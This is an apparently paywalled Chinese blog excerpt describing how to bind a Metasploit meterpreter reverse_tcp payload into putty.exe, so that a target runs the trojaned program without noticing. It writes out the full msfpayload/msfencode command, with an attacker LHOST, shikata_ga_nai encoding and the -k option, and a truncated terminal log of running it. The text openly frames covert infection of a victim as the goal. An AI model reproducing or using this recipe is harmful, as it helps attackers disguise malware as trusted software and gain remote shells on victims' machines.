超级会员免费看
本文介绍了如何利用Metasploit将payload绑定到可执行文件,如putty.exe,以实现隐蔽的攻击。如果不使用-k选项,目标运行程序时不会有cmd窗口出现,而-k则确保payload独立运行。
绑定payload 至一个可执行文件,让目标不知不觉间中招,以putty.exe 为例:
1 |
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.105 R |./msfencode -t exe -x /tmp/putty.exe -k -o /tmp/putty_pro.exe -e x86/shikata_ga_nai -c 5 |
假如选择一个GUI 界面的程序作为绑定目标并且不使用-k 选项,则目标执行此程序的时候不会弹出cmd 窗口,-k 选项的作用是payload 独立于模板软件的进程运行。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
root@Dis9Team:~# cd /pentest/exploits/framework root@Dis9Team:/pentest/exploits/framework# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.105 R |./msfencode -t exe -x /tmp/putty.exe -k -o /tmp/putty_pro.exe -e x86/shikata_ga_nai -c 5 [*] x86/shikata_g |
订阅专栏 解锁全文
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
